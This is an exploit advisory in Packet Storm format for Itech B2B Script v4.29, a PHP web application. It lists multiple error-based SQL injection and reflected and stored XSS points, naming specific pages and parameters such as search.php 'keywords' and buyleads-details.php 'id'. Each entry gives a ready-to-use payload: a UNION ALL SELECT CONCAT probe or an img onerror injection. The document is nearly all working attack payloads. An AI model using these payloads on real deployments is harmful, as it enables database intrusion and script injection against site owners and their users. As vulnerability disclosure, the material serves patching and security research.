Itech B2B 4.2.9 Cross Site Scripting / SQL Injection

2017-02-15T00:00:00
ID PACKETSTORM:141091
Type packetstorm
Reporter Marc Castejon
Modified 2017-02-15T00:00:00

Description

                                        
                                            `Exploit Title : Itech scripts B2B Script v4.29 - Multiple Vulnerability  
Google Dork : -  
Date : 12/02/2017  
Exploit Author : Marc Castejon <marc@silentbreach.com>  
Vendor Homepage : http://itechscripts.com/b2b-script/  
Software Link: http://b2b.itechscripts.com  
Type : webapps  
Platform: PHP  
Version: 4.29  
Sofware Price and Demo : $250  
  
------------------------------------------------  
  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]/search.php  
Vulnerable Parameters: keywords  
Method: GET  
Payload: ') UNION ALL SELECT  
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#  
  
------------------------------------------------  
  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]/search.php  
Vulnerable Parameters: rctyp  
Method: GET  
Payload: ') UNION ALL SELECT  
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#  
  
-----------------------------------------------  
  
Type: Reflected XSS  
Vulnerable URL:http://localhost/[PATH]/search.php  
Vulnerable Parameters: rctyp  
Method: GET  
Payload: <img src=i onerror=prompt(1)>  
  
-----------------------------------------------  
  
Type: Reflected XSS  
Vulnerable URL:http://localhost/[PATH]/search.php  
Vulnerable Parameters: keyword  
Method: GET  
Payload: <img src=i onerror=prompt(1)>  
  
------------------------------------------------  
  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]/catcompany.php  
Vulnerable Parameters: token  
Method: GET  
Payload: ') UNION ALL SELECT  
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#  
  
-----------------------------------------------  
  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]/buyleads-details.php  
Vulnerable Parameters: id  
Method: GET  
Payload: ') UNION ALL SELECT  
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#  
  
-----------------------------------------------  
  
Type: Stored XSS  
Vulnerable URL:http://localhost/[PATH]/ajax-file/sendMessage.php  
Vulnerable Parameters: msg_message  
Method: POST  
Payload: <img src=i onerror=prompt(1)>  
  
------------------------------------------------  
  
Type: Stored XSS  
Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php  
Vulnerable Parameters: fname  
Method: POST  
Payload: <img src=i onerror=prompt(1)>  
  
`